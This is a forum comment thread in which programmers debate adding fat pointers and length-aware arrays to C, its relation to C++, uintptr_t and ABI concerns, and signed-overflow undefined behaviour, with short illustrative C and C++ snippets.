I don't think it's worth wasting time standardizing that, especially since I'd probably hardly ever use that since it doesn't really offer any obvious benefits and "size_t" is massively overkill in many situations.

loeg · on April 15, 2020

> But if you want better arrays you want operator overload to be able to use these arrays as 1st class citizens without having to use array_get(arr, 3), array_len(arr), array_concatenate(arr1, arr2) etc... You want to be able to write "arr[3]", "arr.len()", "arr1 += arr2" etc...

I don't think that's true at all.

1. "arr[3]" syntax can just be part of the language.

2. For length, we already have the "sizeof()" syntax, although admittedly it is a compile-time construct and expanding it to runtime could be confusing. I am ok with using a standard psuedo-function for array-len and would absolutely prefer it to syntax treating first-class arrays as virtual structs with virtual 'len' members.

3. I don't think any C practitioner wants "arr1 += arr2" style magic.

So I don't buy that there is a need for operator overload; the rest of your claims that this is basically an ask for C++ follow baselessly from that premise.

apotheon · on April 16, 2020

> Conversely if you don't want any of this what's wrong with:

As I suggested, adding a(n optional) constraint such that "buf" can be limited by "len" in such a struct is a possible approach to offering safer arrays. Such a change seems like it kinda requires a change to the language.

pjmlp · on April 15, 2020

Apparently not everyone, otherwise it would be part of ISO C already, and it hasn't been for lack of trying.

apotheon · on April 16, 2020

Not literally everyone, I would think, but the previous statement could, in theory, still be true. It would just require some people to want something else, conflicting with that desire, even more.

I know, this is pedantic, I suppose. Mea culpa.

apotheon · on April 16, 2020

> every single item in C++ was wanted and championed by someone

This is irrelevant to the point I made in the text you quoted.

> Well, C did turn into C++. The entity that gave forth C++ is C.

My mother didn't turn into me. She just gave rise to me. She's still alive and well.

My point, which seems to have completely escaped you, is that C itself should not turn into C++, so claims that any attempt at all ever to improve C with the addition of a single constraint mechanism for managing pointer size safely is a slipper slope to duplicating what C++ has become, leaving no non-C++ C language in its wake -- well, such claims seem unlikely to be an unavoidable Truth.

> A good way to have a C++ with fewer features would be to trim from C++ rather than add to C.

Again, my point is not easily crammed into the round hole of your idea of how things worked. It is, instead, that C can have a few more safety features without becoming "C++ with fewer features".

I feel like you didn't read my previous message as a whole at all given the way you responded to it, and just looked for trigger words you could use to push some kind of preconceived notions.

apotheon · on April 16, 2020

That should have said "many contend". Now it seems too late to edit.

twic · on April 14, 2020

> if you want a dialect of C with arrays that know their length, you can use C++

C++ doesn't have arrays which know their length.

zokier · on April 14, 2020

What's std::array then?

> combines the performance and accessibility of a C-style array with the benefits of a standard container, such as knowing its own size

https://en.cppreference.com/w/cpp/container/array

kevin_thibedeau · on April 14, 2020

They're objects that mostly behave like arrays. You can't index element two of std::array foo as 1[foo] since it isn't an actual C array.

kazinator · on April 15, 2020

A Pascal array is just ones and zeros that behave like an array. So is a Fortran array.

> You can't index element two of std::array foo as 1[foo] since it isn't an actual C array.

That's just a silly quirk of C syntax that is deliberately not modeled in C++ operator overloading. It's not a real capability; it doesn't make arrays "do" anything new, so it' hard to call it an array behavior. It's a compiler behavior, that's for sure.

It could easily be added to C++, similarly to the way preincrement and postincrement are represented (which allows that obj++ and ++obj to be separate overloads).

   T &array_class::operator [] (int index) {
      // handles array[42]
   }

   T &array_class::operator [] (int index, int) {  // Fictional!!
      // handles 42[array]
   }

The dummy extra int parameter would mean "this overload of operator [] implements the flipped case, when the object is between the [ ] and the index is on the left".

C++ could easily have this; the technical barrier is almost nonexistent. (I wonder what the minimal diff against GNU C++ would be to get it going.)

I suspect that it's explicitly unwanted.

saagarjha · on April 14, 2020

Ok, but who actually uses that?

kevin_thibedeau · on April 15, 2020

The point is to demonstrate that std::array isn't an array.

kazinator · on April 15, 2020

What makes you so sure that if C got better arrays, those would be arrays, supporting a[i] i[a] commutativity and all?

That is predicated on equivalence to *(a + i) where a is a dumb pointer whose displacement commutes.

pjmlp · on April 15, 2020

That is a quirk of C's arrays, no other language besides Assembly allows for that.

And even in Assembly, it depends on the CPU flavor which kind of memory accesses are available.

kazinator · on April 15, 2020

It depends entirely on the whims of the assembly language design. Assembly lanuages for the Motorola 68000 could allow operand syntax like like [A0 + offset], which could commute with [offset + A0], but the predominant syntax for that CPU family has it as offset(A0) which cannot be written A0(offset).

None of that changes what instruction is generated, just like C's quirk is one of pure syntax that doesn't affect the run-time.

saagarjha · on April 15, 2020

Ok, fair. But for almost all practical purposes, std::array is an appropriate array replacement.

kazinator · on April 14, 2020

C++ has features in its syntax so that you can write objects that behave like arrays: support [] indexing via operator [], and can be passed around (according to whatever ownershihp discipline you want: duplication, reference counting). C++ provides such objects in its standard library, such as: std::basic_string<T> and std::vector<T>. There is a newer std::array also.

pjmlp · on April 15, 2020

And depending on the compiler they can also bounds check, even in release builds, it is a matter of enabling the right build configuration flags.

loeg · on April 14, 2020

Fat pointers in C would involve an ABI break for existing code, in that uintptr_t and uintmax_t would probably need to double in size.

rkangel · on April 14, 2020

It would presumably involve a new type that didn't exist in the current ABI. Those pointers would stay the same, and the new (twice as big) pointers would be used for the array feature.

kazinator · on April 14, 2020

On a given platform, the fat pointer type could have an easily defined ABI expressible in C90 declarations (whose ABI is then deducible accordingly).

For instance, complex double numbers can have an ABI which says that they look like struct { double re, im; };

professoretc · on April 14, 2020

The point of uintptr_t is that it's an integer type to which any pointer type can be cast. If you introduce a new class of pointers which are not compatible with uintptr_t, then suddenly you have pointers which are not pointers.

_kst_ · on April 14, 2020

No, uintptr_t is an integer type to which any object pointer type can be converted without loss of information. (Strictly speaking, the guarantee is for conversion to and from void*.) And if an implementation doesn't have a sufficiently wide integer type, it won't define uintptr_t. (Likewise for intptr_t the signed equivalent.)

There's no guarantee that a function pointer type can be converted to uintptr_t without loss of information.

C currently has two kinds of pointer types: object pointer types and function pointer types. "Fat pointers" could be a third. And since a fat pointer would internally be similar to a structure, converting it to or from an integer doesn't make a whole lot of sense. (If you want to examine the representation, you can use memcpy to copy it to an array of unsigned char.)

saagarjha · on April 15, 2020

Note that POSIX requires that object pointers and function pointers are the same for dlsym.

loeg · on April 15, 2020

Surely you're not arguing that a bounded array is in fact a function rather than an object? The distinction between function and object pointers exists for Harvard architecture computers, which sort of exist (old Atmel AVR before they adopted ARM), but are not dominant.

kazinator · on April 14, 2020

You would be shocked by this language called C++ which is highly compatible with C and has "pointer to member" types that don't fit into a uintptr_t.

(Spoiler: no, there is no uintptr2_t).

loeg · on April 14, 2020

Ditto uintmax_t. We do not want a uintmax2_t.

cesarb · on April 14, 2020

Existing code would be using normal pointers, not fat pointers, so there would be no ABI break. New code using fat pointers would know that they fit into a pair of uintptr_t, so the size of uintptr_t would not need to change either.

loeg · on April 14, 2020

I don't think we want a uintptr_t and uintptr2_t.

monocasa · on April 14, 2020

IDK, it's not like it'd be an auto_ptr situation where you just don't use uintptr_t anymore and call the other one uintptr2_t. THere's different enough semantics that they both still make sesne.

Like, as someone who does real, real dirty stuff in Rust, usize as a uintptr equivalent gets used still even though fat pointers are about as well supported as you can imagine.

goranmoomin · on April 14, 2020

Or... deprecating unsafe or not-well-designed (but this is a bit subjective) ideas. Like... deprecating locales. (For why locales aren't well-designed ideas: https://github.com/mpv-player/mpv/commit/1e70e82baa9193f6f02...)

7532yahoogmail · on April 14, 2020

I agree which brought me into looking at Zig. A future version of C might disallow macros, preprocessor, disallow circular libraries, include a module system, but allow importing legacy libs like Zig. Also something like llvm so we can automatically do static analysis, transforms would be great.

eggy · on April 15, 2020

I am back to learning Zig for the way it addresses some pitfalls in C, but really because it is so easy for cross-platform work. Compiling a program to a Windows exe on my 2011 iMac Pro and then running it on my Windows machine was so easy and the error messages are so helpful when they do occur.

I am not an expert at either C or Zig, so I would appreciate any feedback from anyone who can more intelligently compare the two.

flatfinger · on April 15, 2020

The difference between "Undefined behavior", as the term is used in the Standard, and "Implementation-Defined Behavior", is that implementations are required to document at least some kind of guarantee about the behavior of the latter, even in cases where guaranteeing anything about behavior would be expensive, but nothing that could be guaranteed about the behavior would be useful.

What is needed is a category of actions where implementations (which I would call "conditionally-defined", where implementations would be required to indicate via "machine-readable" means [e.g. predefined macros, compiler intrinsics, etc.] all possible consequences (one of which would be UB), from which the implementation might choose in Unspecified fashion. If an implementation reports that it may process signed arithmetic using temporary values that may, at the compiler's leisure, be of an unspecified size that's larger than specified, but signed overflow will have no effect other than to yield values that may be larger than their type would normally be capable of holding, then the implementation would be required to behave in that fashion if integer overflow occurs.

In general, the most efficient code meeting application requirements could be generated by demanding semantics which are as loose as possible without increasing the amount of user code required to meet those requirements. Because different implementations are used for different purposes, so single set of behavioral guarantees would be optimal for all purposes. If compilers are allowed to reject code that demands guarantees an implementation doesn't support, then the choice of what guarantees to support could safely be treated as a Quality of Implementation issue, but the behavior of code that claims to support guarantees would be a conformance issue.

ori_b · on April 14, 2020

> - Some kind of module system, that allows code to be imported with the possibility of name collisions.

That doesn't particularly need modules -- just some form of

     namespace foo {
     }

dooglius · on April 14, 2020

You can very easily make a struct consisting of a pointer and length, is adding such a thing to the standard really a big deal? Personally, I don't see a problem with passing two arguments.

Someone1234 · on April 14, 2020

- In your example there's no guarantee that the length will be accurate, or that the data hasn't been modified independently elsewhere in the program.

- In other words you've created a fantastic shoe-gun. One update line missed (either length or data, or data re-used outside the struct) and your "simple" struct is a huge headache, including potential security vulnerabilities.

- Re-implementing a common error prone thing is exactly what language improvements should target.

rwmj · on April 14, 2020

I mean, this is C so "fantastic shoe-gun" is part of the territory. But in C you can wrap this vector struct in an abstract data type to try to prevent callers from breaking invariants.

dooglius · on April 14, 2020

>In your example there's no guarantee that the length will be accurate, or that the data hasn't been modified independently elsewhere in the program.

And having a special data-and-length type would make these guarantees... how? You're ultimately going to need to be able to create these objects from bare data and length somehow, so it's a case of garbage-in-garbage-out.

gbear605 · on April 14, 2020

Declaring it with a custom struct:

    int raw_arr[4] = {0,0,0,0};
    struct SmartArray arr;
    arr.length = 4;
    arr.val = raw_arr;
    some_function(arr);

Smart declaration with custom type: (assume that they'll come up with a good syntax)

    smart_int_arr arr[4] = {0,0,0,0};
    some_function(arr);

With the custom struct, it requires the number `4` to be typed twice manually, while in the second it only needs a single input.

fkeeal · on April 15, 2020

You actually never need to specify the size explicitly in C.

Here are some other ways to declare your struct without needing as much boiler plate per declaration.

    #define MAKE_SMARTARRAY(_smartarr, _array) \
            do {\
                _smartarr.val = (_array);\
                _smartarr.len = sizeof((_array))/sizeof((_array[0]));\
            }while(0)
    
    struct SmartArray
    {
        int *val;
        int len;
    };
    
    int main()
    {
        int array[] = {0,0,0,0};
        
        struct SmartArray arr = {.val = array, 
                                    .len = sizeof(array)/sizeof(array[0])};
        struct SmartArray arr2;
        struct SmartArray arr3;
        
        MAKE_SMARTARRAY(arr2, ((int[]){5,6,7,8}));
        MAKE_SMARTARRAY(arr3, array);
    
        return 0;
    }

flatfinger · on April 15, 2020

How about having an attribute which, if applied to a structure that contains a `T*` and an integer type, would allow a `T[]` to be implicitly converted to that structure type?

FpUser · on April 14, 2020

In Delphi/FreePascal there are dynamic arrays (strings included) that are in fact fat pointers that hide inside more info than just length. All opaque types and work just fine with automatic lifecycle control and COW and whatnot.

metalforever · on April 14, 2020

What does clean up c mean?

beefhash · on April 14, 2020

Now that C2x plans to make two's complement the only sign representation, is there any reason why signed overflow has to continue being undefined behavior?

On a slightly more personal note: What are some undefined behaviors that you would like to turn into defined behavior, but can't change for whatever reasons that be?

cataphract · on April 14, 2020

Signed overflow being undefined behavior allows optimizations that wouldn't otherwise be possible

Quoting http://blog.llvm.org/2011/05/what-every-c-programmer-should-...

> This behavior enables certain classes of optimizations that are important for some code. For example, knowing that INT_MAX+1 is undefined allows optimizing "X+1 > X" to "true". Knowing the multiplication "cannot" overflow (because doing so would be undefined) allows optimizing "X*2/2" to "X". While these may seem trivial, these sorts of things are commonly exposed by inlining and macro expansion. A more important optimization that this allows is for "<=" loops like this:

> for (i = 0; i <= N; ++i) { ... }

> In this loop, the compiler can assume that the loop will iterate exactly N+1 times if "i" is undefined on overflow, which allows a broad range of loop optimizations to kick in. On the other hand, if the variable is defined to wrap around on overflow, then the compiler must assume that the loop is possibly infinite (which happens if N is INT_MAX) - which then disables these important loop optimizations. This particularly affects 64-bit platforms since so much code uses "int" as induction variables.

userbinator · on April 15, 2020

I've always thought that assuming such things should be wrong, because if you were writing the Asm manually, you would certainly think about it and NOT optimise unless you had a very good reason why it won't overflow. Likewise, I think that unless the compiler can prove that it, it should, like the sane human, refrain from making the assumption.

scaredginger · on April 15, 2020

Well, by that reasoning, if you were coding in C, you would certainly think about it and ensure overflows won't happen.

The fact is that if the compiler encounters undefined behaviour, it can do basically whatever it wants and it will still be standard-compliant.

rbultje · on April 14, 2020

> for (i = 0; i <= N; ++i) { ... }

The worst thing is that people take it as acceptable that this loop is going to operate differently upon overflow (e.g. assume N is TYPE_MAX) depending on whether i or N are signed vs. unsigned.

JoeAltmaier · on April 14, 2020

Is this a real concern, beyond 'experts panel' esoteric discussion? Do folks really put a number into an int, that is sometimes going to need to be exactly TYPE_MAX but no larger?

I've gone a lifetime programming, and this kind of stuff never, ever matters one iota.

btilly · on April 14, 2020

Yes, people really do care about overflow. Because it gets used in security checks, and if they don't understand the behavior then their security checks don't do what they expected.

https://gcc.gnu.org/bugzilla/show_bug.cgi?id=30475 shows someone going hyperbolic over the issue. The technical arguments favor the GCC maintainers. However I prefer the position of the person going hyperbolic.

JoeAltmaier · on April 14, 2020

That example was not 'overflow'. It was 'off by one'? That seems uninteresting, outside as you say the security issue where somebody might take advantage of it.

btilly · on April 14, 2020

That example absolutely was overflow. The bug is, "assert(int+100 > int) optimized away".

GCC has the behavior that overflowing a signed integer gives you a negative one. But an if tests that TESTS for that is optimized away!

The reason is that overflow is undefined behavior, and therefore they are within their rights to do anything that they want. So they actually overflow in the fastest way possible, and optimize code on the assumption that overflow can't happen.

The fact that almost no programmers have a mental model of the language that reconciles these two facts is an excellent reason to say that very few programmers should write in C. Because the compiler really is out to get you.

JoeAltmaier · on April 14, 2020

Sure. Sorry, I was ambiguous. The earlier example of ++i in a loop I was thinking of. Anyway, yes, overflow for small ints is a real thing.

sdegutis · on April 14, 2020

The very few times I've ever put in a check like that, I always do something like i < MAX_INT - 5 just to be sure, because I'm never confident that I intuitively understand off-by-one errors.

JoeAltmaier · on April 15, 2020

Same here. But I instead run a loop over a range around MAX_INT (or wherever the issue is) and print the result, so I know I'm doing what I think I'm doing. Exhaustive testing is quick, with a computer!